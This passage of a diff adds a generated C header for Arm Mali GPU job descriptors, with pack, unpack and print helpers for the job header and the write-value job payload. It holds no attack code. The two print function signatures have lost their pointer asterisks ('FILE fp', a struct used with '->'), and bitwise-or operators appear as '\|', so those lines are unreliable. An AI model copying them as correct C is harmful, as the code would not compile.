28	+	#ifndef NDEBUG
29	+	const int width = end - start + 1;
30	+	if (width < 64) {
31	+	const uint64_t max = (1ull << width) - 1;
32	+	assert(v <= max);
33	+	}
34	+	#endif
35	+
36	+	return v << start;
37	+	}
38	+
39	+	static inline uint64_t
40	+	__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end)
41	+	{
42	+	uint64_t val = 0;
43	+	const int width = end - start + 1;
44	+	const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
45	+
46	+	for (int byte = start / 8; byte <= end / 8; byte++) {
47	+	val \|= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
48	+	}
49	+
50	+	return (val >> (start % 8)) & mask;
51	+	}
52	+
53	+	enum mali_job_type {
54	+	MALI_JOB_TYPE_NOT_STARTED = 0,
55	+	MALI_JOB_TYPE_NULL = 1,
56	+	MALI_JOB_TYPE_WRITE_VALUE = 2,
57	+	MALI_JOB_TYPE_CACHE_FLUSH = 3,
58	+	MALI_JOB_TYPE_COMPUTE = 4,
59	+	MALI_JOB_TYPE_VERTEX = 5,
60	+	MALI_JOB_TYPE_GEOMETRY = 6,
61	+	MALI_JOB_TYPE_TILER = 7,
62	+	MALI_JOB_TYPE_FUSED = 8,
63	+	MALI_JOB_TYPE_FRAGMENT = 9,
64	+	};
65	+
66	+	enum mali_write_value_type {
67	+	MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
68	+	MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
69	+	MALI_WRITE_VALUE_TYPE_ZERO = 3,
70	+	MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
71	+	MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
72	+	MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
73	+	MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
74	+	};
75	+
76	+
77	+	struct MALI_WRITE_VALUE_JOB_PAYLOAD {
78	+	uint64_t address;
79	+	enum mali_write_value_type type;
80	+	uint64_t immediate_value;
81	+	};
82	+
83	+	struct MALI_JOB_HEADER {
84	+	uint32_t exception_status;
85	+	uint32_t first_incomplete_task;
86	+	uint64_t fault_pointer;
87	+	bool is_64b;
88	+	enum mali_job_type type;
89	+	bool barrier;
90	+	bool invalidate_cache;
91	+	bool suppress_prefetch;
92	+	bool enable_texture_mapper;
93	+	bool relax_dependency_1;
94	+	bool relax_dependency_2;
95	+	uint32_t index;
96	+	uint32_t dependency_1;
97	+	uint32_t dependency_2;
98	+	uint64_t next;
99	+	};
100	+
101	+
102	+	static inline void
103	+	MALI_JOB_HEADER_pack(uint32_t * restrict cl,
104	+	const struct MALI_JOB_HEADER * restrict values)
105	+	{
106	+	cl[ 0] = __gen_uint(values->exception_status, 0, 31);
107	+	cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31);
108	+	cl[ 2] = __gen_uint(values->fault_pointer, 0, 63);
109	+	cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32;
110	+	cl[ 4] = __gen_uint(values->is_64b, 0, 0) \|
111	+	__gen_uint(values->type, 1, 7) \|
112	+	__gen_uint(values->barrier, 8, 8) \|
113	+	__gen_uint(values->invalidate_cache, 9, 9) \|
114	+	__gen_uint(values->suppress_prefetch, 11, 11) \|
115	+	__gen_uint(values->enable_texture_mapper, 12, 12) \|
116	+	__gen_uint(values->relax_dependency_1, 14, 14) \|
117	+	__gen_uint(values->relax_dependency_2, 15, 15) \|
118	+	__gen_uint(values->index, 16, 31);
119	+	cl[ 5] = __gen_uint(values->dependency_1, 0, 15) \|
120	+	__gen_uint(values->dependency_2, 16, 31);
121	+	cl[ 6] = __gen_uint(values->next, 0, 63);
122	+	cl[ 7] = __gen_uint(values->next, 0, 63) >> 32;
123	+	}
124	+
125	+
126	+	#define MALI_JOB_HEADER_LENGTH 32
127	+	struct mali_job_header_packed { uint32_t opaque[8]; };
128	+	static inline void
129	+	MALI_JOB_HEADER_unpack(const uint8_t * restrict cl,
130	+	struct MALI_JOB_HEADER * restrict values)
131	+	{
132	+	if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n");
133	+	values->exception_status = __gen_unpack_uint(cl, 0, 31);
134	+	values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63);
135	+	values->fault_pointer = __gen_unpack_uint(cl, 64, 127);
136	+	values->is_64b = __gen_unpack_uint(cl, 128, 128);
137	+	values->type = __gen_unpack_uint(cl, 129, 135);
138	+	values->barrier = __gen_unpack_uint(cl, 136, 136);
139	+	values->invalidate_cache = __gen_unpack_uint(cl, 137, 137);
140	+	values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139);
141	+	values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140);
142	+	values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142);
143	+	values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143);
144	+	values->index = __gen_unpack_uint(cl, 144, 159);
145	+	values->dependency_1 = __gen_unpack_uint(cl, 160, 175);
146	+	values->dependency_2 = __gen_unpack_uint(cl, 176, 191);
147	+	values->next = __gen_unpack_uint(cl, 192, 255);
148	+	}
149	+
150	+	static inline const char *
151	+	mali_job_type_as_str(enum mali_job_type imm)
152	+	{
153	+	switch (imm) {
154	+	case MALI_JOB_TYPE_NOT_STARTED: return "Not started";
155	+	case MALI_JOB_TYPE_NULL: return "Null";
156	+	case MALI_JOB_TYPE_WRITE_VALUE: return "Write value";
157	+	case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush";
158	+	case MALI_JOB_TYPE_COMPUTE: return "Compute";
159	+	case MALI_JOB_TYPE_VERTEX: return "Vertex";
160	+	case MALI_JOB_TYPE_GEOMETRY: return "Geometry";
161	+	case MALI_JOB_TYPE_TILER: return "Tiler";
162	+	case MALI_JOB_TYPE_FUSED: return "Fused";
163	+	case MALI_JOB_TYPE_FRAGMENT: return "Fragment";
164	+	default: return "XXX: INVALID";
165	+	}
166	+	}
167	+
168	+	static inline void
169	+	MALI_JOB_HEADER_print(FILE fp, const struct MALI_JOB_HEADER values, unsigned indent)
170	+	{
171	+	fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status);
172	+	fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task);
173	+	fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer);
174	+	fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false");
175	+	fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type));
176	+	fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false");
177	+	fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false");
178	+	fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false");
179	+	fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false");
180	+	fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false");
181	+	fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false");
182	+	fprintf(fp, "%*sIndex: %u\n", indent, "", values->index);
183	+	fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1);
184	+	fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2);
185	+	fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next);
186	+	}
187	+
188	+	static inline void
189	+	MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl,
190	+	const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
191	+	{
192	+	cl[ 0] = __gen_uint(values->address, 0, 63);
193	+	cl[ 1] = __gen_uint(values->address, 0, 63) >> 32;
194	+	cl[ 2] = __gen_uint(values->type, 0, 31);
195	+	cl[ 3] = 0;
196	+	cl[ 4] = __gen_uint(values->immediate_value, 0, 63);
197	+	cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32;
198	+	}
199	+
200	+
201	+	#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24
202	+	#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0
203	+
204	+
205	+	struct mali_write_value_job_payload_packed { uint32_t opaque[6]; };
206	+	static inline void
207	+	MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl,
208	+	struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values)
209	+	{
210	+	if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n");
211	+	values->address = __gen_unpack_uint(cl, 0, 63);
212	+	values->type = __gen_unpack_uint(cl, 64, 95);
213	+	values->immediate_value = __gen_unpack_uint(cl, 128, 191);
214	+	}
215	+
216	+	static inline const char *
217	+	mali_write_value_type_as_str(enum mali_write_value_type imm)
218	+	{
219	+	switch (imm) {
220	+	case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter";
221	+	case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp";
222	+	case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero";
223	+	case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8";
224	+	case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16";
225	+	case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32";
226	+	case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64";
227	+	default: return "XXX: INVALID";
228	+	}
229	+	}
230	+
231	+	static inline void
232	+	MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD values, unsigned indent)
233	+	{
234	+	fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address);
235	+	fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type));
236	+	fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value);
237	+	}
238	+
239	+	struct mali_write_value_job_packed {
240	+	uint32_t opaque[14];
241	+	};
242	+
243	+	#define MALI_JOB_HEADER_header \
244	+	.is_64b = true
245	+
246	+	#define MALI_WRITE_VALUE_JOB_LENGTH 56
247	+	#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER
248	+	#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header
249	+	#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack
250	+	#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack
251	+	#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print
252	+	#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0
253	+	#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD
254	+	#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header
255	+	#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack
256	+	#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack
257	+	#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print
258	+	#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32
259	+
260	+	#endif
261	+

Initial commit